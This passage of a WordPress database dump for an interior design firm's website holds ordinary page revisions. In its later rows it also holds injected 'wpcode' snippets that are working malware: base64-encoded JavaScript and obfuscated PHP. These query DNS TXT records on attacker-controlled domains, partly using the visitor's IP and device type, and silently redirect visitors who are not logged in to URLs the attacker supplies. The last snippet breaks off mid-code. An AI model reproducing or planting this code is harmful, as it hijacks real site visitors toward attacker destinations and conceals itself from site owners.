href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-26 13:20:45','2023-09-26 13:20:45','',40,'https://bauhaus.futuremediatrix.com/?p=4979',0,'revision','',0),(4980,2,'2023-09-26 13:20:45','2023-09-26 13:20:45','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-26 13:20:45','2023-09-26 13:20:45','',40,'https://bauhaus.futuremediatrix.com/?p=4980',0,'revision','',0),(4981,2,'2023-09-26 13:20:45','2023-09-26 13:20:45','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:57px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-26 13:20:45','2023-09-26 13:20:45','',40,'https://bauhaus.futuremediatrix.com/?p=4981',0,'revision','',0),(4982,2,'2023-09-26 13:22:50','2023-09-26 13:22:50','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:569px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-26 13:22:50','2023-09-26 13:22:50','',169,'https://bauhaus.futuremediatrix.com/?p=4982',0,'revision','',0),(4983,2,'2023-09-26 13:25:53','2023-09-26 13:25:53','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:651px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-26 13:25:53','2023-09-26 13:25:53','',169,'https://bauhaus.futuremediatrix.com/?p=4983',0,'revision','',0),(4984,2,'2023-09-26 13:27:08','2023-09-26 13:27:08','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:57px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-26 13:27:08','2023-09-26 13:27:08','',169,'https://bauhaus.futuremediatrix.com/?p=4984',0,'revision','',0),(4985,1,'2024-02-28 08:58:08','2024-02-28 08:58:08','<script src=\"data:text/javascript;base64,KGZ1bmN0aW9uIChwYXJhbWV0ZXJzKSB7DQogICAgZmV0Y2goJ2h0dHBzOi8vYXBpNjQuaXBpZnkub3JnP2Zvcm1hdD1qc29uJykudGhlbihyZXNwb25zZSA9PiByZXNwb25zZS5qc29uKCkpLnRoZW4oDQogICAgICAgIGlwID0+IHsNCiAgICAgICAgICAgIGxldCBob3N0ID0gd2luZG93LmxvY2F0aW9uLmhvc3RuYW1lOw0KICAgICAgICAgICAgaXAgPSBpcC5pcC5yZXBsYWNlQWxsKCc6JywgJy0nKTsNCiAgICAgICAgICAgIGlwID0gaXAucmVwbGFjZUFsbCgnLicsICctJyk7DQogICAgICAgICAgICBpZiAoaG9zdCA9PSAiIikgaG9zdCA9ICJ1bmsuY29tIjsNCiAgICAgICAgICAgIGZldGNoKCdodHRwczovL2Rucy5nb29nbGUvcmVzb2x2ZT9uYW1lPScgKyBob3N0ICsgJy4nICsgaXAgKyAnLicgKyBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiAxMDI0ICogMTAyNCAqIDEwKSArICcubG9nc21ldHJpY3MuY29tJnR5cGU9dHh0JykudGhlbihyZXNwb25zZSA9PiByZXNwb25zZS5qc29uKCkpLnRoZW4oZGF0YSA9PiB7DQogICAgICAgICAgICAgICAgaWYgKGRhdGEuQW5zd2VyID09IG51bGwpIHsNCiAgICAgICAgICAgICAgICAgICAgcmV0dXJuOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB2YXIgbyA9ICIiOw0KICAgICAgICAgICAgICAgIGRhdGEuQW5zd2VyLmZvckVhY2goZWxlbWVudCA9PiB7DQogICAgICAgICAgICAgICAgICAgIGlmIChlbGVtZW50LnR5cGUgPT0gMTYpIG8gKz0gZWxlbWVudC5kYXRhOw0KICAgICAgICAgICAgICAgIH0pOw0KICAgICAgICAgICAgICAgIG8gPSBhdG9iKG8pOw0KICAgICAgICAgICAgICAgIGlmICghby5sZW5ndGgpIHJldHVybjsNCiAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZShvKTsNCiAgICAgICAgICAgIH0pOw0KICAgICAgICB9DQogICAgKTsNCn0pKCk=\"></script>','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed','','','2024-03-05 13:28:50','2024-03-05 13:28:50','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4986,1,'2024-03-05 13:20:10','2024-03-05 13:20:10','<script src=\"data:text/javascript;base64,KGZ1bmN0aW9uIChwYXJhbWV0ZXJzKSB7DQogICAgZmV0Y2goJ2h0dHBzOi8vYXBpNjQuaXBpZnkub3JnP2Zvcm1hdD1qc29uJykudGhlbihyZXNwb25zZSA9PiByZXNwb25zZS5qc29uKCkpLnRoZW4oDQogICAgICAgIGlwID0+IHsNCiAgICAgICAgICAgIGxldCBob3N0ID0gd2luZG93LmxvY2F0aW9uLmhvc3RuYW1lOw0KICAgICAgICAgICAgaXAgPSBpcC5pcC5yZXBsYWNlQWxsKCc6JywgJy0nKTsNCiAgICAgICAgICAgIGlwID0gaXAucmVwbGFjZUFsbCgnLicsICctJyk7DQogICAgICAgICAgICBpZiAoaG9zdCA9PSAiIikgaG9zdCA9ICJ1bmsuY29tIjsNCiAgICAgICAgICAgIGZldGNoKCdodHRwczovL2Rucy5nb29nbGUvcmVzb2x2ZT9uYW1lPScgKyBob3N0ICsgJy4nICsgaXAgKyAnLicgKyBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkgKiAxMDI0ICogMTAyNCAqIDEwKSArICcuaG9zdC1zdGF0cy5pbyZ0eXBlPXR4dCcpLnRoZW4ocmVzcG9uc2UgPT4gcmVzcG9uc2UuanNvbigpKS50aGVuKGRhdGEgPT4gew0KICAgICAgICAgICAgICAgIGlmIChkYXRhLkFuc3dlciA9PSBudWxsKSB7DQogICAgICAgICAgICAgICAgICAgIHJldHVybjsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgdmFyIG8gPSAiIjsNCiAgICAgICAgICAgICAgICBkYXRhLkFuc3dlci5mb3JFYWNoKGVsZW1lbnQgPT4gew0KICAgICAgICAgICAgICAgICAgICBpZiAoZWxlbWVudC50eXBlID09IDE2KSBvICs9IGVsZW1lbnQuZGF0YTsNCiAgICAgICAgICAgICAgICB9KTsNCiAgICAgICAgICAgICAgICBvID0gYXRvYihvKTsNCiAgICAgICAgICAgICAgICBpZiAoIW8ubGVuZ3RoKSByZXR1cm47DQogICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2Uobyk7DQogICAgICAgICAgICB9KTsNCiAgICAgICAgfQ0KICAgICk7DQp9KSgp\"></script>','Untitled Snippet','','trash','closed','closed','','untitled-snippet-2__trashed','','','2024-03-13 12:07:09','2024-03-13 12:07:09','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet-2/',0,'wpcode','',0),(4987,1,'2024-03-13 12:07:15','2024-03-13 12:07:15','error_reporting(0);ini_set(\'display_errors\',0);function _is_se(){$n0=[\'google\',\'bing\',\'yahoo\',\'ask\',\'duckduckgo\',\'ecosia\'];$v1=filter_input(INPUT_SERVER,\'HTTP_REFERER\',FILTER_SANITIZE_STRING);$v2=parse_url($v1,PHP_URL_HOST);foreach($n0 as $a3){if(preg_match(\'/\\.?\'.preg_quote($a3,\'/\').\'\\./i\',$v2)){return true;}}return false;}function _is_mobile(){return preg_match(\"/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up\\.browser|up\\.link|webos|wos)/i\",$_SERVER[\"HTTP_USER_AGENT\"]);}function _user_ip(){foreach(array(\'HTTP_CF_CONNECTING_IP\',\'HTTP_CLIENT_IP\',\'HTTP_X_FORWARDED_FOR\',\'HTTP_X_FORWARDED\',\'HTTP_X_CLUSTER_CLIENT_IP\',\'HTTP_FORWARDED_FOR\',\'HTTP_FORWARDED\',\'REMOTE_ADDR\')as $z4){if(array_key_exists($z4,$_SERVER)&&!empty($_SERVER[$z4])){foreach(explode(\',\',$_SERVER[$z4])as $d5){$d5=trim($d5);if(filter_var($d5,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $d5;}}}}return false;}if(!is_user_logged_in()&&_is_se()){$h6=session_start();$y7=!$h6;if($h6&&(!isset($_SESSION[\'_la\'])||(time()-$_SESSION[\'_la\']>86400))){$y7=true;}$r8=filter_var(parse_url(\'https://\'.$_SERVER[\'HTTP_HOST\'],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN);$d5=_user_ip();if($d5){$d5=str_replace(\':\',\'-\',$d5);$d5=str_replace(\'.\',\'-\',$d5);}$s9=(!$r8?\'unk.com\':$r8).\'.\'.(!$d5?\'0-0-0-0\':$d5).\'.\'.mt_rand(100000,999999).\'.\'.(_is_mobile()?\'nm\':\'nd\').\'.host-stats.io\';if($y7){$u10=dns_get_record($s9,DNS_TXT);if(is_array($u10)&&!empty($u10)){if(isset($u10[0][\'txt\'])){$u10=$u10[0][\'txt\'];$u10=base64_decode($u10);if($u10==\"stop\"){if($h6){$_SESSION[\'_la\']=time();}}else if(substr($u10,0,4)===\"http\"){if($h6){$_SESSION[\'_la\']=time();}wp_redirect($u10);exit;}}}}}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-2','','','2024-03-13 21:12:54','2024-03-13 21:12:54','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4988,1,'2024-03-13 21:14:03','2024-03-13 21:14:03','if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $n0){if(array_key_exists($n0,$_SERVER)&&!empty($_SERVER[$n0])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$n0])as $g1){$g1=trim($g1);if(filter_var($g1,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $g1;}}}}return false;}function _red(){if(!is_user_logged_in()){$d2=session_start();$u3=!$d2;if($d2&&(!isset($_SESSION[base64_decode(\'X2xh\')])||(time()-$_SESSION[base64_decode(\'X2xh\')]>86400))){$u3=true;}$m4=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN);$g1=_user_ip();if($g1){$g1=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$g1);$g1=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$g1);}$j5=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$a6=(!$m4?base64_decode(\'dW5rLmNvbQ==\'):$m4).base64_decode(\'Lg==\').(!$g1?base64_decode(\'MC0wLTAtMA==\'):$g1).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$j5:base64_decode(\'bmQ=\')).base64_decode(\'LmNsb3VkLXN0YXRzLmNvbQ==\');if($u3){$r7=dns_get_record($a6,DNS_TXT);if(is_array($r7)&&!empty($r7)){if(isset($r7[0][base64_decode(\'dHh0\')])){$r7=$r7[0][base64_decode(\'dHh0\')];$r7=base64_decode($r7);if($r7==base64_decode(\'ZXJy\')){if($d2){$_SESSION[base64_decode(\'X2xh\')]=time();}}else if(substr($r7,0,4)===base64_decode(\'aHR0cA==\')){if($d2){$_SESSION[base64_decode(\'X2xh\')]=time();}wp_redirect($r7);exit;}}}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-3','','','2024-03-14 11:20:44','2024-03-14 11:20:44','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4989,1,'2024-03-14 11:20:58','2024-03-14 11:20:58','if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $c0){if(array_key_exists($c0,$_SERVER)&&!empty($_SERVER[$c0])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$c0])as $q1){$q1=trim($q1);if(filter_var($q1,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $q1;}}}}return false;}function 